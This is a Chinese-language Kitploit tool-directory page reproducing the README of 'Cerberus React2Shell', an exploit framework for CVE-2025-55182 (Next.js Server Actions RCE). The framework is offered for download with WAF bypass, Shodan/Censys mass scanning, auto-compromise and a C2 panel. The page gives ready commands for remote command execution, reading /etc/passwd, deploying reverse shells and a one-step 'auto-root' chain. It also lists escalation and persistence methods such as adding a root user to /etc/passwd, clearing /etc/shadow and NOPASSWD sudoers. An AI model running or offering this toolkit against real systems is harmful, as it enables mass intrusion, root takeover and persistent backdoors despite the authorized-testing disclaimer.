Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Cerberus-React2Shell-Scanner-Exploit — 精英利用工具包,针对CVE-2025-55182(React服务器组件远程代码执行)。异步多态载荷,高级WAF/CDN绕过,代理轮换,Shodan/Censys大规模扫描,自动攻陷+反向Shell,Nuclei模板,K8s实验室&C2面板。作者:Sudeepa Wanigarathna – 严格限于授权的红队和渗透测试。 | Kitploit
工具/GitHubGitHub/cerberusmrxi/cerberus-react2shell-scanner-exploit
渗透测试框架权限提升漏洞扫描器漏洞利用框架ShellcodeWeb应用程序漏洞利用后渗透利用命令与控制学习与教育
红队
Payload 开发
实验室与实践
GitHubcerberusmrxi/cerberus-react2shell-scanner-exploit

Cerberus-React2Shell-Scanner-Exploit

精英利用工具包,针对CVE-2025-55182(React服务器组件远程代码执行)。异步多态载荷,高级WAF/CDN绕过,代理轮换,Shodan/Censys大规模扫描,自动攻陷+反向Shell,Nuclei模板,K8s实验室&C2面板。作者:Sudeepa Wanigarathna – 严格限于授权的红队和渗透测试。

查看仓库
21818天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Cerberus React2Shell - 武器化利用框架

root@kitploit:~
  ██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗   ██╗
 ██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║   ██║
 ██║      █████╗  ██████╔╝██████╔╝█████╗  ██████╔╝██║   ██║
 ██║      ██╔══╝  ██╔══██╗██╔══██╗██╔══╝  ██╔══██╗██║   ██║
 ╚██████╗ ███████╗██║  ██║██████╔╝███████╗██║  ██║╚██████╔╝
  ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝
  
         React2Shell 利用框架 v1.0
              作者:Sudeepa Wanigarathna

🎯 概述

专业级 Next.js Server Actions RCE 漏洞(React2Shell)利用框架。演示从初始访问到 root 权限提升的完整攻击链。

功能特性:

  • ✅ 自动化漏洞检测
  • ✅ 远程代码执行(RCE)
  • ✅ 交互式 Shell 访问
  • ✅ Linux 系统枚举
  • ✅ 自动化权限提升
  • ✅ 反向 Shell 部署
  • ✅ 文件上传/下载
  • ✅ Root 访问演示

🚀 快速开始

基本 RCE

root@kitploit:~
# 检查漏洞
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# 执行命令
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"

交互式 Shell

root@kitploit:~
python3 interactive_shell.py --target http://127.0.0.1:3000

全自动攻击链

root@kitploit:~
# 完整利用:RCE → 枚举 → Root 访问
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

📁 框架结构

root@kitploit:~
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py      # 核心利用引擎(400+ 行)
├── demo_exploit.py              # 自动化攻击链(290+ 行)
├── interactive_shell.py         # 交互式 Shell(280+ 行)
├── reverse_shell_handler.py     # 反向 Shell 监听器(180+ 行)
├── post_exploit/
│   ├── linux_enum.py           # 系统枚举(330+ 行)
│   ├── priv_esc.py             # 权限提升(320+ 行)
│   └── __init__.py
├── EXPLOITATION_GUIDE.md        # 完整使用文档
├── QUICKSTART.md                # 快速参考
└── BANNER.txt

🔥 功能特性

核心利用引擎

  • Action ID 发现:从 JavaScript 包中自动提取
  • 多种载荷:execSync、spawn、eval、mainModule 变体
  • 输出提取:从错误响应中解析命令输出
  • WAF 绕过:载荷混淆技术

后渗透利用

  • Linux 枚举:SUID/SGID 二进制文件、可写路径、cron 任务、内核版本
  • 权限提升:GTFOBins、可写 /etc 文件、Docker 逃逸、能力(capabilities)
  • 文件操作:使用 base64 编码上传/下载
  • 持久化:多种后门方法

交互式工具

  • 交互式 Shell:带内置命令的实时命令执行
  • 反向 Shell:多种 Shell 类型(bash、python、nc、perl)
  • 演示模式:6 步自动化演示

📖 使用示例

1. 基本命令

root@kitploit:~
# 漏洞检查
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# 执行命令
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"

# 不同的载荷变体
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn

# 启用混淆
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate

2. 交互式 Shell

root@kitploit:~
# 启动 Shell
python3 interactive_shell.py --target http://127.0.0.1:3000

# 可用命令:
# - execute <cmd>        : 执行 Shell 命令
# - enum                 : 运行完整枚举
# - escalate             : 尝试权限提升
# - upload <local> <remote>  : 上传文件
# - download <remote> <local>: 下载文件
# - shell <lhost> <lport>: 部署反向 Shell
# - info                 : 显示会话信息
# - exit                 : 退出

3. 反向 Shell

root@kitploit:~
# 终端 1:启动监听器
python3 reverse_shell_handler.py --lport 4444

# 终端 2:部署 Shell
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
  --revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash

4. 自动化演示

root@kitploit:~
# 完整攻击链:发现 → RCE → 枚举 → Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

🎯 攻击链

该框架实现了完整的 6 步利用链:

  1. 发现 - 从 JavaScript 包中提取 Server Action ID
  2. 利用 - 找到可用的 Action ID 并实现 RCE
  3. 验证 - 使用 id 命令确认代码执行
  4. 枚举 - 收集系统信息、SUID 二进制文件、可写路径
  5. 提升 - 自动利用权限提升向量
  6. 演示 - 通过读取 /etc/shadow 和列出 /root 证明 root 访问权限

🛡️ 权限提升技术

已实现的方法

  1. SUID 二进制文件(GTFOBins)

    • find、vim、python、perl、bash、awk、sed、less、more、nmap
  2. 可写 /etc 文件

    • /etc/passwd - 添加新的 root 用户
    • /etc/shadow - 清除 root 密码
    • /etc/sudoers - 授予 NOPASSWD sudo 权限
  3. Docker 逃逸

    • 可利用的 Docker socket 漏洞
    • 特权容器突破
  4. 内核漏洞利用

    • DirtyCow(CVE-2016-5195)
    • Dirty Pipe(CVE-2022-0847)
    • PwnKit(CVE-2021-4034)
  5. Linux 能力(Capabilities)

    • CAP_SETUID、CAP_DAC_OVERRIDE 利用

📊 统计数据

  • 总代码行数:1,800+
  • 模块数:8
  • 权限提升技术:5
  • 载荷变体:4
  • Shell 类型:4(bash、python、nc、perl)

⚙️ 环境要求

root@kitploit:~
pip install -r requirements.txt

依赖项:

  • requests
  • colorama

📚 文档

  • EXPLOITATION_GUIDE.md - 带示例的完整使用指南
  • QUICKSTART.md - 常用命令快速参考

⚠️ 免责声明

警告:此工具仅用于授权安全测试。未经授权访问计算机系统属于违法行为。仅可在您拥有或已获得明确书面许可的系统上使用。

作者对任何滥用此工具的行为不承担任何责任。使用风险自负。

🎓 教育目的

该框架设计用于:

  • 研究 Next.js 漏洞的安全研究人员
  • 获得授权的渗透测试人员
  • 安全培训和 CTF 挑战
  • 受控实验室环境中的漏洞研究

📄 许可证

MIT 许可证(仅限教育目的)

👤 作者

Sudeepa Wanigarathna

  • 漏洞利用开发专家
  • 安全研究员
  • 渗透测试人员

版本:1.0
最后更新:2025 年 12 月

有关详细使用说明,请参阅 EXPLOITATION_GUIDE.md

下载工具